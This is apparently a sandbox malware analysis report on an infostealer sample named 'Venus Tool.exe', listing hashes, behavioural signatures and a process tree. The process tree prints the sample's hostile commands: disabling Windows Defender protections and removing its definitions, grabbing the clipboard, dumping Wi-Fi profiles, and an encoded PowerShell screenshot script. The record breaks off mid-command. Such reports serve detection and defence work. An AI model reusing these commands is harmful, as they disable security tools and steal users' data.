Analysis
-
max time kernel
138s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
21-06-2024 06:15
Behavioral task
behavioral1
Sample
Venus Tool.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Venus Tool.exe
Resource
win10v2004-20240226-en
General
-
Target
Venus Tool.exe
-
Size
5.9MB
-
MD5
4238a832dbee926a3888e4ca18c9bff8
-
SHA1
3d1a7c8a85b33f7b71b6e3cd608c70b5fa19b07d
-
SHA256
88c11f9c63b5ab1f0e479c6d0fce5f9262496f7b76a918256181b677451909e3
-
SHA512
81fec5d57208a7f49dd3fed769841709e8ad890d277e1b6ee83b36c93608df18d8577bd7e61915d60f2c01aa3467ff5c36501a8fba4c85d9cbfdb48783663690
-
SSDEEP
98304:rN+nhjdRai65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeFl9hikrK0ZM:rAnpIDOYjJlpZstQoS9Hf12VKX6biCGV
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 3908 powershell.exe 368 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 916 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
Venus Tool.exepid process 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe 4512 Venus Tool.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI35882\python310.dll upx behavioral2/memory/4512-24-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\libffi-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\_socket.pyd upx behavioral2/memory/4512-48-0x00007FFA17B40000-0x00007FFA17B4F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI35882\libcrypto-1_1.dll upx behavioral2/memory/4512-30-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx behavioral2/memory/4512-54-0x00007FFA174A0000-0x00007FFA174CC000-memory.dmp upx behavioral2/memory/4512-56-0x00007FFA178D0000-0x00007FFA178E8000-memory.dmp upx behavioral2/memory/4512-58-0x00007FFA17030000-0x00007FFA1704E000-memory.dmp upx behavioral2/memory/4512-60-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx behavioral2/memory/4512-62-0x00007FFA17010000-0x00007FFA17029000-memory.dmp upx behavioral2/memory/4512-64-0x00007FFA16FD0000-0x00007FFA16FDD000-memory.dmp upx behavioral2/memory/4512-66-0x00007FFA16FA0000-0x00007FFA16FCE000-memory.dmp upx behavioral2/memory/4512-68-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx behavioral2/memory/4512-69-0x00007FFA16CA0000-0x00007FFA16D57000-memory.dmp upx behavioral2/memory/4512-73-0x00007FFA06000000-0x00007FFA06377000-memory.dmp upx behavioral2/memory/4512-72-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx behavioral2/memory/4512-76-0x00007FFA16C80000-0x00007FFA16C95000-memory.dmp upx behavioral2/memory/4512-78-0x00007FFA174A0000-0x00007FFA174CC000-memory.dmp upx behavioral2/memory/4512-79-0x00007FFA16F90000-0x00007FFA16F9D000-memory.dmp upx behavioral2/memory/4512-81-0x00007FFA05EE0000-0x00007FFA05FF8000-memory.dmp upx behavioral2/memory/4512-82-0x00007FFA17030000-0x00007FFA1704E000-memory.dmp upx behavioral2/memory/4512-194-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx behavioral2/memory/4512-217-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx behavioral2/memory/4512-216-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx behavioral2/memory/4512-231-0x00007FFA17010000-0x00007FFA17029000-memory.dmp upx behavioral2/memory/4512-227-0x00007FFA06000000-0x00007FFA06377000-memory.dmp upx behavioral2/memory/4512-226-0x00007FFA16CA0000-0x00007FFA16D57000-memory.dmp upx behavioral2/memory/4512-222-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx behavioral2/memory/4512-221-0x00007FFA17030000-0x00007FFA1704E000-memory.dmp upx behavioral2/memory/4512-230-0x00007FFA05EE0000-0x00007FFA05FF8000-memory.dmp upx behavioral2/memory/4512-225-0x00007FFA16FA0000-0x00007FFA16FCE000-memory.dmp upx behavioral2/memory/4512-297-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx behavioral2/memory/4512-303-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx behavioral2/memory/4512-298-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx behavioral2/memory/4512-330-0x00007FFA17010000-0x00007FFA17029000-memory.dmp upx behavioral2/memory/4512-338-0x00007FFA06500000-0x00007FFA06965000-memory.dmp upx behavioral2/memory/4512-343-0x00007FFA17030000-0x00007FFA1704E000-memory.dmp upx behavioral2/memory/4512-342-0x00007FFA178D0000-0x00007FFA178E8000-memory.dmp upx behavioral2/memory/4512-341-0x00007FFA174A0000-0x00007FFA174CC000-memory.dmp upx behavioral2/memory/4512-340-0x00007FFA17B40000-0x00007FFA17B4F000-memory.dmp upx behavioral2/memory/4512-339-0x00007FFA17620000-0x00007FFA17644000-memory.dmp upx behavioral2/memory/4512-337-0x00007FFA05EE0000-0x00007FFA05FF8000-memory.dmp upx behavioral2/memory/4512-336-0x00007FFA16F90000-0x00007FFA16F9D000-memory.dmp upx behavioral2/memory/4512-335-0x00007FFA16C80000-0x00007FFA16C95000-memory.dmp upx behavioral2/memory/4512-333-0x00007FFA16CA0000-0x00007FFA16D57000-memory.dmp upx behavioral2/memory/4512-332-0x00007FFA16FA0000-0x00007FFA16FCE000-memory.dmp upx behavioral2/memory/4512-331-0x00007FFA16FD0000-0x00007FFA16FDD000-memory.dmp upx behavioral2/memory/4512-329-0x00007FFA06380000-0x00007FFA064F1000-memory.dmp upx behavioral2/memory/4512-334-0x00007FFA06000000-0x00007FFA06377000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid process 1100 tasklist.exe 4084 tasklist.exe 3096 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 7 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3660 taskkill.exe 1412 taskkill.exe 1436 taskkill.exe 1216 taskkill.exe 4824 taskkill.exe 4404 taskkill.exe 2108 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3908 powershell.exe 4436 powershell.exe 3908 powershell.exe 4436 powershell.exe 368 powershell.exe 368 powershell.exe 368 powershell.exe 3996 powershell.exe 3996 powershell.exe 3908 powershell.exe 3908 powershell.exe 4436 powershell.exe 4436 powershell.exe 3996 powershell.exe 1096 powershell.exe 1096 powershell.exe 2580 powershell.exe 2580 powershell.exe 912 powershell.exe 912 powershell.exe 368 powershell.exe 368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exetasklist.exepowershell.exeWMIC.exetasklist.exepowershell.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3908 powershell.exe Token: SeDebugPrivilege 4436 powershell.exe Token: SeDebugPrivilege 1100 tasklist.exe Token: SeDebugPrivilege 368 powershell.exe Token: SeIncreaseQuotaPrivilege 1120 WMIC.exe Token: SeSecurityPrivilege 1120 WMIC.exe Token: SeTakeOwnershipPrivilege 1120 WMIC.exe Token: SeLoadDriverPrivilege 1120 WMIC.exe Token: SeSystemProfilePrivilege 1120 WMIC.exe Token: SeSystemtimePrivilege 1120 WMIC.exe Token: SeProfSingleProcessPrivilege 1120 WMIC.exe Token: SeIncBasePriorityPrivilege 1120 WMIC.exe Token: SeCreatePagefilePrivilege 1120 WMIC.exe Token: SeBackupPrivilege 1120 WMIC.exe Token: SeRestorePrivilege 1120 WMIC.exe Token: SeShutdownPrivilege 1120 WMIC.exe Token: SeDebugPrivilege 1120 WMIC.exe Token: SeSystemEnvironmentPrivilege 1120 WMIC.exe Token: SeRemoteShutdownPrivilege 1120 WMIC.exe Token: SeUndockPrivilege 1120 WMIC.exe Token: SeManageVolumePrivilege 1120 WMIC.exe Token: 33 1120 WMIC.exe Token: 34 1120 WMIC.exe Token: 35 1120 WMIC.exe Token: 36 1120 WMIC.exe Token: SeDebugPrivilege 4084 tasklist.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeDebugPrivilege 3096 tasklist.exe Token: SeIncreaseQuotaPrivilege 1120 WMIC.exe Token: SeSecurityPrivilege 1120 WMIC.exe Token: SeTakeOwnershipPrivilege 1120 WMIC.exe Token: SeLoadDriverPrivilege 1120 WMIC.exe Token: SeSystemProfilePrivilege 1120 WMIC.exe Token: SeSystemtimePrivilege 1120 WMIC.exe Token: SeProfSingleProcessPrivilege 1120 WMIC.exe Token: SeIncBasePriorityPrivilege 1120 WMIC.exe Token: SeCreatePagefilePrivilege 1120 WMIC.exe Token: SeBackupPrivilege 1120 WMIC.exe Token: SeRestorePrivilege 1120 WMIC.exe Token: SeShutdownPrivilege 1120 WMIC.exe Token: SeDebugPrivilege 1120 WMIC.exe Token: SeSystemEnvironmentPrivilege 1120 WMIC.exe Token: SeRemoteShutdownPrivilege 1120 WMIC.exe Token: SeUndockPrivilege 1120 WMIC.exe Token: SeManageVolumePrivilege 1120 WMIC.exe Token: 33 1120 WMIC.exe Token: 34 1120 WMIC.exe Token: 35 1120 WMIC.exe Token: 36 1120 WMIC.exe Token: SeDebugPrivilege 4824 taskkill.exe Token: SeDebugPrivilege 4404 taskkill.exe Token: SeDebugPrivilege 2108 taskkill.exe Token: SeDebugPrivilege 3660 taskkill.exe Token: SeDebugPrivilege 1412 taskkill.exe Token: SeDebugPrivilege 1436 taskkill.exe Token: SeDebugPrivilege 1216 taskkill.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeIncreaseQuotaPrivilege 2980 WMIC.exe Token: SeSecurityPrivilege 2980 WMIC.exe Token: SeTakeOwnershipPrivilege 2980 WMIC.exe Token: SeLoadDriverPrivilege 2980 WMIC.exe Token: SeSystemProfilePrivilege 2980 WMIC.exe Token: SeSystemtimePrivilege 2980 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Venus Tool.exeVenus Tool.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exepowershell.execmd.execmd.exedescription pid process target process PID 3588 wrote to memory of 4512 3588 Venus Tool.exe Venus Tool.exe PID 3588 wrote to memory of 4512 3588 Venus Tool.exe Venus Tool.exe PID 4512 wrote to memory of 4640 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4640 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4424 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4424 4512 Venus Tool.exe cmd.exe PID 4640 wrote to memory of 3908 4640 cmd.exe powershell.exe PID 4640 wrote to memory of 3908 4640 cmd.exe powershell.exe PID 4424 wrote to memory of 4436 4424 cmd.exe powershell.exe PID 4424 wrote to memory of 4436 4424 cmd.exe powershell.exe PID 4512 wrote to memory of 4232 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4232 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 1056 4512 Venus Tool.exe Conhost.exe PID 4512 wrote to memory of 1056 4512 Venus Tool.exe Conhost.exe PID 4512 wrote to memory of 436 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 436 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 2084 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 2084 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 2716 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 2716 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4020 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4020 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4632 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4632 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4224 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 4224 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 1132 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 1132 4512 Venus Tool.exe cmd.exe PID 4232 wrote to memory of 1100 4232 cmd.exe tasklist.exe PID 4232 wrote to memory of 1100 4232 cmd.exe tasklist.exe PID 4224 wrote to memory of 368 4224 cmd.exe powershell.exe PID 4224 wrote to memory of 368 4224 cmd.exe powershell.exe PID 2716 wrote to memory of 5008 2716 cmd.exe tree.com PID 2716 wrote to memory of 5008 2716 cmd.exe tree.com PID 4020 wrote to memory of 4060 4020 cmd.exe netsh.exe PID 4020 wrote to memory of 4060 4020 cmd.exe netsh.exe PID 1056 wrote to memory of 1120 1056 cmd.exe csc.exe PID 1056 wrote to memory of 1120 1056 cmd.exe csc.exe PID 436 wrote to memory of 3996 436 cmd.exe powershell.exe PID 436 wrote to memory of 3996 436 cmd.exe powershell.exe PID 1132 wrote to memory of 4084 1132 cmd.exe tasklist.exe PID 1132 wrote to memory of 4084 1132 cmd.exe tasklist.exe PID 4632 wrote to memory of 4520 4632 cmd.exe systeminfo.exe PID 4632 wrote to memory of 4520 4632 cmd.exe systeminfo.exe PID 2084 wrote to memory of 3096 2084 cmd.exe tasklist.exe PID 2084 wrote to memory of 3096 2084 cmd.exe tasklist.exe PID 4512 wrote to memory of 4568 4512 Venus Tool.exe Conhost.exe PID 4512 wrote to memory of 4568 4512 Venus Tool.exe Conhost.exe PID 4568 wrote to memory of 4448 4568 cmd.exe tree.com PID 4568 wrote to memory of 4448 4568 cmd.exe tree.com PID 4512 wrote to memory of 2716 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 2716 4512 Venus Tool.exe cmd.exe PID 2716 wrote to memory of 3228 2716 cmd.exe cmd.exe PID 2716 wrote to memory of 3228 2716 cmd.exe cmd.exe PID 4512 wrote to memory of 3460 4512 Venus Tool.exe cmd.exe PID 4512 wrote to memory of 3460 4512 Venus Tool.exe cmd.exe PID 368 wrote to memory of 1120 368 powershell.exe csc.exe PID 368 wrote to memory of 1120 368 powershell.exe csc.exe PID 3460 wrote to memory of 1088 3460 cmd.exe tree.com PID 3460 wrote to memory of 1088 3460 cmd.exe tree.com PID 4512 wrote to memory of 332 4512 Venus Tool.exe Conhost.exe PID 4512 wrote to memory of 332 4512 Venus Tool.exe Conhost.exe PID 332 wrote to memory of 4020 332 cmd.exe tree.com PID 332 wrote to memory of 4020 332 cmd.exe tree.com
Processes
-
C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe"C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe"C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Venus Tool.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3908 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4436 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1100 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3096 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:5008
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4520 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZ